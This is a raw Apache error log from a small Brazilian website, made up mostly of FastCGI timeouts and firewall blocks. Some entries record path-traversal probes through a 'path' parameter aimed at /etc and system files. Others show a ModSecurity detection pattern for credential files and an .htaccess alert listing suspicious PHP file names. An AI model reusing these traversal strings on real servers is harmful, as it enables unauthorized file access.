[Thu Mar 19 15:19:01.611721 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:38606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw-FeoXxyEfFpUF8f8tvgAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Thu Mar 19 15:19:12.130022 2026] [proxy_fcgi:error] [pid 8307:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43226] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:19:34.117113 2026] [proxy_fcgi:error] [pid 21219:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43724] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:19:58.125017 2026] [proxy_fcgi:error] [pid 21563:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44256] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:20:28.133836 2026] [proxy_fcgi:error] [pid 7235:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:44914] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:20:58.129924 2026] [proxy_fcgi:error] [pid 19655:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45522] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:21:30.118991 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46206] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:22:02.182212 2026] [proxy_fcgi:error] [pid 19655:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47008] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:22:30.129803 2026] [proxy_fcgi:error] [pid 7235:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47684] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:22:53.128663 2026] [proxy_fcgi:error] [pid 21219:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48236] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:23:15.155454 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48748] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:23:16.849537 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.244.43:39964] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw_FOoXxyEfFpUF8f8uggAAAUc"]
[Thu Mar 19 15:23:21.718501 2026] [:error] [pid 7545:tid 140411741927168] [client 74.7.228.61:56178] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw_GX8B84UptSoTJtYxQwAAAYA"]
[Thu Mar 19 15:23:37.129824 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49224] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:24:01.046099 2026] [proxy_fcgi:error] [pid 27293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49894] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:24:23.126030 2026] [proxy_fcgi:error] [pid 7235:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50562] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:24:45.547997 2026] [proxy_fcgi:error] [pid 27293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51256] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:25:12.129812 2026] [proxy_fcgi:error] [pid 14269:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:52044] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:25:34.194035 2026] [proxy_fcgi:error] [pid 20435:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52716] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:25:56.126329 2026] [proxy_fcgi:error] [pid 7235:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53290] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:26:20.129806 2026] [proxy_fcgi:error] [pid 7545:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54032] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:26:44.557206 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54698] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:27:06.128467 2026] [proxy_fcgi:error] [pid 7235:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55258] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:27:19.045429 2026] [core:alert] [pid 19655:tid 140411683178240] [client 57.141.18.18:58818] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 15:27:32.594370 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55900] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:27:56.437810 2026] [proxy_fcgi:error] [pid 7545:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:28:28.149818 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57412] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:28:52.133796 2026] [proxy_fcgi:error] [pid 7893:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58090] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:29:12.032059 2026] [mime_magic:error] [pid 26799:tid 140411733534464] (70014)End of file found: [client 74.7.241.31:54108] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/check_mk_agent
[Thu Mar 19 15:29:15.121824 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58758] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:29:38.045861 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59400] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:30:02.202007 2026] [proxy_fcgi:error] [pid 21219:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60090] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:30:27.136637 2026] [proxy_fcgi:error] [pid 7545:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:60678] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:30:51.560769 2026] [mime_magic:error] [pid 5816:tid 140411624429312] (70014)End of file found: [client 57.141.18.72:36898] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:30:55.130372 2026] [proxy_fcgi:error] [pid 8307:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33208] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:30:55.739403 2026] [mime_magic:error] [pid 15826:tid 140411683178240] (70014)End of file found: [client 57.141.18.95:37038] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:31:19.089351 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33854] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:31:37.845326 2026] [mime_magic:error] [pid 17653:tid 140411582465792] (70014)End of file found: [client 57.141.18.115:38388] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:31:41.153784 2026] [proxy_fcgi:error] [pid 8307:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34518] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:32:03.525877 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:35076] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:32:30.654464 2026] [mime_magic:error] [pid 21563:tid 140411624429312] (70014)End of file found: [client 57.141.18.102:40192] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:32:31.121799 2026] [proxy_fcgi:error] [pid 14269:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35798] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:32:44.511179 2026] [core:alert] [pid 17653:tid 140411725141760] [client 74.7.243.128:58584] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/run
[Thu Mar 19 15:32:57.137812 2026] [proxy_fcgi:error] [pid 7235:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36462] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:33:13.577810 2026] [core:alert] [pid 7235:tid 140411616036608] [client 57.141.18.112:41604] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 15:33:25.145778 2026] [proxy_fcgi:error] [pid 7545:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37348] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:33:30.456992 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.228.61:58830] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxBevqxLDW4GITHUkSLcAAAAQw"]
[Thu Mar 19 15:33:52.129805 2026] [proxy_fcgi:error] [pid 15826:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38164] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:34:20.077772 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39064] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:34:43.133829 2026] [proxy_fcgi:error] [pid 7235:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39800] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:35:07.173857 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:40538] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:35:39.093806 2026] [proxy_fcgi:error] [pid 7893:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41324] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:35:56.310280 2026] [mime_magic:error] [pid 19655:tid 140411624429312] (70014)End of file found: [client 57.141.18.26:46844] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:36:08.037819 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42272] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:36:30.125799 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42992] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:36:48.328145 2026] [mime_magic:error] [pid 21219:tid 140411616036608] (70014)End of file found: [client 57.141.18.63:48528] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:36:52.125794 2026] [proxy_fcgi:error] [pid 20435:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43768] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:37:12.237805 2026] [core:alert] [pid 7893:tid 140411691570944] [client 57.141.18.15:49202] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 15:37:14.125834 2026] [proxy_fcgi:error] [pid 19655:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:44458] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:37:16.120372 2026] [mime_magic:error] [pid 20435:tid 140411599251200] (70014)End of file found: [client 57.141.18.106:49338] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:37:36.069890 2026] [proxy_fcgi:error] [pid 21219:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45234] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:37:54.881580 2026] [mime_magic:error] [pid 8307:tid 140411716749056] (70014)End of file found: [client 57.141.18.46:50410] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:37:58.129777 2026] [proxy_fcgi:error] [pid 21563:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45896] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:38:24.128203 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46770] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:38:28.319915 2026] [:error] [pid 19655:tid 140411716749056] [client 74.7.244.43:50140] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxCpE1ujooLWdUDGy73pAAAAEM"]
[Thu Mar 19 15:38:32.034524 2026] [mime_magic:error] [pid 7893:tid 140411658000128] (70014)End of file found: [client 57.141.18.47:51822] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:38:53.135279 2026] [proxy_fcgi:error] [pid 21219:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47702] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:39:22.129807 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48642] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:39:43.982766 2026] [mime_magic:error] [pid 15826:tid 140411649607424] (70014)End of file found: [client 57.141.18.57:54070] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 15:39:52.125775 2026] [proxy_fcgi:error] [pid 7235:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49690] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:40:20.129784 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50570] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:40:46.269818 2026] [proxy_fcgi:error] [pid 7893:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51374] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:41:10.041827 2026] [proxy_fcgi:error] [pid 15826:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52144] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:41:34.061930 2026] [proxy_fcgi:error] [pid 21563:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52924] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:42:00.135310 2026] [proxy_fcgi:error] [pid 7235:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:53728] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:42:26.129198 2026] [proxy_fcgi:error] [pid 21563:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:42:49.126059 2026] [proxy_fcgi:error] [pid 7545:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55326] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:43:11.098863 2026] [proxy_fcgi:error] [pid 8307:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56004] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:43:30.633711 2026] [:error] [pid 8307:tid 140411683178240] [client 74.7.244.43:34026] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxD0r-FhjpZGs9ba8qOBgAAAwc"]
[Thu Mar 19 15:43:33.122157 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56722] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:43:55.715269 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.228.61:41090] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxD6wbLMZ6AikZjR9WAaAAAAAg"]
[Thu Mar 19 15:43:57.141816 2026] [proxy_fcgi:error] [pid 8307:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57464] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:44:23.445795 2026] [proxy_fcgi:error] [pid 7545:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58270] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:44:49.149822 2026] [proxy_fcgi:error] [pid 19655:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:45:19.145878 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60018] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:45:53.037834 2026] [proxy_fcgi:error] [pid 21219:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:32994] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:46:28.601394 2026] [proxy_fcgi:error] [pid 5816:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33648] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:48:11.596485 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34942] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:49:02.659569 2026] [:error] [pid 8307:tid 140411574073088] [client 74.7.244.43:33874] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxFHr-FhjpZGs9ba8qONAAAAxQ"]
[Thu Mar 19 15:49:17.001898 2026] [:error] [pid 27293:tid 140411708356352] [client 74.7.228.61:38874] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxFLP-YZRR_7pZ7nDKuCQAAA8Q"]
[Thu Mar 19 15:49:37.133774 2026] [proxy_fcgi:error] [pid 27293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36282] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:50:28.125984 2026] [proxy_fcgi:error] [pid 5816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36732] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:51:01.092965 2026] [proxy_fcgi:error] [pid 7235:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:36940] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:51:31.121809 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37080] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:51:59.137820 2026] [proxy_fcgi:error] [pid 14269:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37180] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:52:21.120402 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37328] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:52:48.037944 2026] [proxy_fcgi:error] [pid 7893:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37490] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:53:26.045844 2026] [proxy_fcgi:error] [pid 5816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37672] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:53:58.121853 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:54:08.647735 2026] [:error] [pid 5816:tid 140411691570944] [client 74.7.244.43:57498] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxGUJfmNfuxceSuAEK44wAAAcY"]
[Thu Mar 19 15:54:19.034017 2026] [proxy_fcgi:error] [pid 15826:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:54:19.745279 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.228.61:52198] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxGW-oXxyEfFpUF8f8wYQAAAVY"]
[Thu Mar 19 15:54:40.129799 2026] [proxy_fcgi:error] [pid 17653:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38408] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:55:01.127072 2026] [proxy_fcgi:error] [pid 21563:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38720] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:55:22.091833 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39056] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:55:43.133823 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:39456] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:56:06.137870 2026] [proxy_fcgi:error] [pid 19655:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39948] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:56:27.129847 2026] [proxy_fcgi:error] [pid 7545:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40398] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:56:49.633806 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40894] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:57:12.141779 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41428] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:57:33.125861 2026] [proxy_fcgi:error] [pid 21563:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41896] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:57:54.133862 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42350] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:58:16.129809 2026] [proxy_fcgi:error] [pid 7235:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42804] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:58:41.045885 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43336] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:59:10.034484 2026] [:error] [pid 20435:tid 140411590858496] [client 74.7.244.43:32936] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxHfZJaM1-0uhhUQJM81gAAAJI"]
[Thu Mar 19 15:59:18.125245 2026] [proxy_fcgi:error] [pid 7235:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44130] AH01075: Error dispatching request to : (polling)
